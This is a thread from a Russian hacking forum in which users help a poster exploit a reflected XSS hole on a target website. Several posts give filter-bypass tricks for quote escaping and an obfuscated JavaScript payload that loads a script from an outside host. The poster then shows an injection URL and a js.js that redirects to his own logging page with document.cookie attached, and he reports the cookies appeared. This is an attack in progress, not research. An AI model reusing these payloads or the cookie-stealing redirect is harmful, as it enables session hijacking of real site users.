23.11.2009, 19:08
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
С нами:
9649706
Репутация:
3338
|
|
если есть надпись Microsoft - то явно не просто Mysql, как сам считаешь?
|
|
|
23.11.2009, 19:10
|
|
Постоянный
Регистрация: 07.02.2006
Сообщений: 630
С нами:
10660753
Репутация:
676
|
|
Сообщение от Pashkela
если есть надпись Microsoft - то явно не просто Mysql, как сам считаешь?
а если есть надпись mysqld-4.0.20a-nt ?
|
|
|
|
23.11.2009, 19:16
|
|
Познавший АНТИЧАТ
Регистрация: 10.06.2006
Сообщений: 1,113
С нами:
10483586
Репутация:
5826
|
|
Сообщение от Pashkela
если есть надпись Microsoft - то явно не просто Mysql, как сам считаешь?
- от туда и надпись Microsoft
А БД там MySQL.
Ты так и не научился что либо читать, а по прежнему уверено отвечаешь на вопросы, которые сам не понимаешь.
Последний раз редактировалось Grey; 23.11.2009 в 19:20..
|
|
|
|
23.11.2009, 22:40
|
|
Познающий
Регистрация: 16.11.2009
Сообщений: 38
С нами:
8677074
Репутация:
15
|
|
Ситуация в том что я нашел xss но при попытке засунуть ей вот этот скрипт
PHP код:
<SCRIPT type="text/javascript" src="http://your_site.com/js.js"></SCRIPT>
Нечего не происходит так как у него фильтр на " и %22 его аналог фильтр заключается в том что перед ним он ставит знак \ а именно
PHP код:
<SCRIPT type=\"text/javascript\" src=\"http://your_site.com/js.js\"></SCRIPT>
Его можно как нибудь обойти или это все?
просто когда пишешь
PHP код:
<script>alert(document.cookie)</script>
Все показывает. |
|
|
|
23.11.2009, 23:02
|
|
Новичок
Регистрация: 07.11.2009
Сообщений: 23
С нами:
8688843
Репутация:
10
|
|
ставь одинарные кавычки
|
|
|
|
23.11.2009, 23:17
|
|
Познающий
Регистрация: 16.11.2009
Сообщений: 38
С нами:
8677074
Репутация:
15
|
|
Опять ставит фильтр
PHP код:
<SCRIPT type=\'text/javascript\' src=\'http://my_site.com/js.js\'></SCRIPT>
Последний раз редактировалось xofffff; 23.11.2009 в 23:22..
|
|
|
|
23.11.2009, 23:20
|
|
Новичок
Регистрация: 07.11.2009
Сообщений: 23
С нами:
8688843
Репутация:
10
|
|
Сообщение от xofffff
Опять ставит фильтр
PHP код:
<SCRIPT type=text/javascript src=http://alert.h16.ru/cb/js.js></SCRIPT>
не уверен быдет ли пахать...
add:
http://sec-123.narod.ru/xss/HTML.txt
Последний раз редактировалось [Forest]; 23.11.2009 в 23:37..
|
|
|
|
24.11.2009, 00:11
|
|
Участник форума
Регистрация: 18.07.2009
Сообщений: 272
С нами:
8850336
Репутация:
330
|
|
2 xofffff
Попробуй так:
Код:
<script>$=~[];$={___:++$,$$$$:(![]+"")[$],__$:++$,$_$_:(![]+"")[$],_$_:++$,$_$$:({}+"")[$],$$_$:($[$]+"")[$],_$$:++$,$$$_:(!""+"")[$],$__:++$,$_$:++$,$$__:({}+"")[$],$$_:++$,$$$:++$,$___:++$,$__$:++$};$.$_=($.$_=$+"")[$.$_$]+($._$=$.$_[$.__$])+($.$$=($.$+"")[$.__$])+((!$)+"")[$._$$]+($.__=$.$_[$.$$_])+($.$=(!""+"")[$.__$])+($._=(!""+"")[$._$_])+$.$_[$.$_$]+$.__+$._$+$.$;$.$$=$.$+(!""+"")[$._$$]+$.__+$._+$.$+$.$$;$.$=($.___)[$.$_][$.$_];$.$($.$($.$$+"\""+"\\"+$.__$+$.$_$+$.__$+"\\"+$.__$+$.$_$+$.$_$+"\\"+$.__$+$.$__+$.$$$+"\\"+$.$$$+$.$_$+"\\"+$.__$+$.$_$+$.$$_+$.$$$_+"\\"+$.__$+$.$$_+$.$$$+" \\"+$.__$+$.__$+$.__$+"\\"+$.__$+$.$_$+$.$_$+$.$_$_+"\\"+$.__$+$.$__+$.$$$+$.$$$_+"()\\"+$.$$$+$._$$+"\\"+$.__$+$.$_$+$.__$+"\\"+$.__$+$.$_$+$.$_$+"\\"+$.__$+$.$__+$.$$$+".\\"+$.__$+$.$$_+$._$$+"\\"+$.__$+$.$$_+$._$_+$.$$__+"\\"+$.$$$+$.$_$+"\\\"\\"+$.__$+$.$_$+$.___+$.__+$.__+"\\"+$.__$+$.$$_+$.___+"\\"+$.$$$+$._$_+"//"+$.$_$_+(![]+"")[$._$_]+$.$$$_+"\\"+$.__$+$.$$_+$._$_+$.__+".\\"+$.__$+$.$_$+$.___+$.__$+$.$$_+".\\"+$.__$+$.$$_+$._$_+$._+"/"+$.$$__+$.$_$$+"/\\"+$.__$+$.$_$+$._$_+"\\"+$.__$+$.$$_+$._$$+".\\"+$.__$+$.$_$+$._$_+"\\"+$.__$+$.$$_+$._$$+"\\\"\\"+$.$$$+$._$$+"\"")())();</script>
Это закодированое
Код:
<script>img=new Image();img.src="http://alert.h16.ru/cb/js.js";</script>
UPD:
Хотя, если двойные кавычки под фильтром, то не выйдет, только что обратил внимание.
<SCRIPT type=text/javascript src=http://alert.h16.ru/cb/js.js></SCRIPT>
Это к стати работает!
Последний раз редактировалось Ins3t; 24.11.2009 в 00:17..
|
|
|
|
24.11.2009, 00:25
|
|
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
С нами:
10340793
Репутация:
66
|
|
Сообщение от Pashkela
Зато меня искренне радует ваше внимание. Кстати, YuNi|[c - чей смит?  не понял что ты имел ввиду под красным!!!
Сообщение от Ins3t
2 xofffff
Попробуй так:
Код:
<script>$=~[];$={___:++$,$$$$:(![]+"")[$],__$:++$,$_$_:(![]+"")[$],_$_:++$,$_$$:({}+"")[$],$$_$:($[$]+"")[$],_$$:++$,$$$_:(!""+"")[$],$__:++$,$_$:++$,$$__:({}+"")[$],$$_:++$,$$$:++$,$___:++$,$__$:++$};$.$_=($.$_=$+"")[$.$_$]+($._$=$.$_[$.__$])+($.$$=($.$+"")[$.__$])+((!$)+"")[$._$$]+($.__=$.$_[$.$$_])+($.$=(!""+"")[$.__$])+($._=(!""+"")[$._$_])+$.$_[$.$_$]+$.__+$._$+$.$;$.$$=$.$+(!""+"")[$._$$]+$.__+$._+$.$+$.$$;$.$=($.___)[$.$_][$.$_];$.$($.$($.$$+"\""+"\\"+$.__$+$.$_$+$.__$+"\\"+$.__$+$.$_$+$.$_$+"\\"+$.__$+$.$__+$.$$$+"\\"+$.$$$+$.$_$+"\\"+$.__$+$.$_$+$.$$_+$.$$$_+"\\"+$.__$+$.$$_+$.$$$+" \\"+$.__$+$.__$+$.__$+"\\"+$.__$+$.$_$+$.$_$+$.$_$_+"\\"+$.__$+$.$__+$.$$$+$.$$$_+"()\\"+$.$$$+$._$$+"\\"+$.__$+$.$_$+$.__$+"\\"+$.__$+$.$_$+$.$_$+"\\"+$.__$+$.$__+$.$$$+".\\"+$.__$+$.$$_+$._$$+"\\"+$.__$+$.$$_+$._$_+$.$$__+"\\"+$.$$$+$.$_$+"\\\"\\"+$.__$+$.$_$+$.___+$.__+$.__+"\\"+$.__$+$.$$_+$.___+"\\"+$.$$$+$._$_+"//"+$.$_$_+(![]+"")[$._$_]+$.$$$_+"\\"+$.__$+$.$$_+$._$_+$.__+".\\"+$.__$+$.$_$+$.___+$.__$+$.$$_+".\\"+$.__$+$.$$_+$._$_+$._+"/"+$.$$__+$.$_$$+"/\\"+$.__$+$.$_$+$._$_+"\\"+$.__$+$.$$_+$._$$+".\\"+$.__$+$.$_$+$._$_+"\\"+$.__$+$.$$_+$._$$+"\\\"\\"+$.$$$+$._$$+"\"")())();</script>
Это закодированое
Код:
<script>img=new Image();img.src="http://alert.h16.ru/cb/js.js";</script>
UPD:
Хотя, если двойные кавычки под фильтром, то не выйдет, только что обратил внимание.
Это к стати работает! Это чем же закодировано? Можно ли потом чтоб обйти двойные кавычки закодироват еще чем нибудь (hex, base64)?
Последний раз редактировалось YuNi|[c; 24.11.2009 в 00:49..
|
|
|
|
24.11.2009, 01:12
|
|
Познающий
Регистрация: 16.11.2009
Сообщений: 38
С нами:
8677074
Репутация:
15
|
|
Сообщение от Ins3t
2 xofffff
Попробуй так:
Код:
<script>$=~[];$={___:++$,$$$$:(![]+"")[$],__$:++$,$_$_:(![]+"")[$],_$_:++$,$_$$:({}+"")[$],$$_$:($[$]+"")[$],_$$:++$,$$$_:(!""+"")[$],$__:++$,$_$:++$,$$__:({}+"")[$],$$_:++$,$$$:++$,$___:++$,$__$:++$};$.$_=($.$_=$+"")[$.$_$]+($._$=$.$_[$.__$])+($.$$=($.$+"")[$.__$])+((!$)+"")[$._$$]+($.__=$.$_[$.$$_])+($.$=(!""+"")[$.__$])+($._=(!""+"")[$._$_])+$.$_[$.$_$]+$.__+$._$+$.$;$.$$=$.$+(!""+"")[$._$$]+$.__+$._+$.$+$.$$;$.$=($.___)[$.$_][$.$_];$.$($.$($.$$+"\""+"\\"+$.__$+$.$_$+$.__$+"\\"+$.__$+$.$_$+$.$_$+"\\"+$.__$+$.$__+$.$$$+"\\"+$.$$$+$.$_$+"\\"+$.__$+$.$_$+$.$$_+$.$$$_+"\\"+$.__$+$.$$_+$.$$$+" \\"+$.__$+$.__$+$.__$+"\\"+$.__$+$.$_$+$.$_$+$.$_$_+"\\"+$.__$+$.$__+$.$$$+$.$$$_+"()\\"+$.$$$+$._$$+"\\"+$.__$+$.$_$+$.__$+"\\"+$.__$+$.$_$+$.$_$+"\\"+$.__$+$.$__+$.$$$+".\\"+$.__$+$.$$_+$._$$+"\\"+$.__$+$.$$_+$._$_+$.$$__+"\\"+$.$$$+$.$_$+"\\\"\\"+$.__$+$.$_$+$.___+$.__+$.__+"\\"+$.__$+$.$$_+$.___+"\\"+$.$$$+$._$_+"//"+$.$_$_+(![]+"")[$._$_]+$.$$$_+"\\"+$.__$+$.$$_+$._$_+$.__+".\\"+$.__$+$.$_$+$.___+$.__$+$.$$_+".\\"+$.__$+$.$$_+$._$_+$._+"/"+$.$$__+$.$_$$+"/\\"+$.__$+$.$_$+$._$_+"\\"+$.__$+$.$$_+$._$$+".\\"+$.__$+$.$_$+$._$_+"\\"+$.__$+$.$$_+$._$$+"\\\"\\"+$.$$$+$._$$+"\"")())();</script>
Это закодированое
Код:
<script>img=new Image();img.src="http://alert.h16.ru/cb/js.js";</script>
UPD:
Хотя, если двойные кавычки под фильтром, то не выйдет, только что обратил внимание.
Это к стати работает! No input file specified.
Написало когда ввел
Код:
?username='><SCRIPT type=text/javascript src=http://alert.h16.ru/cb/js.js></SCRIPT></script>
и куки написались в строке браузера но в base.php не сохранились 
В js.js у меня
PHP код:
location.href =www.site.h16.ru/cb/log.php? + document.cookie;
Кстати еще в строке браузера после того как я написал скрипт перешел на страничку слова No input file specified.
Код:
http://hacksite.com/log.php?и тут cookie
Последний раз редактировалось xofffff; 24.11.2009 в 01:23..
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для [Forest]](/avatars/avatar103206.jpg?1710550){kind=avatar}
![Аватар для [Forest]](/avatars/avatar103206.jpg?1710596){kind=avatar}
Похожие темы
Комбинированный вид
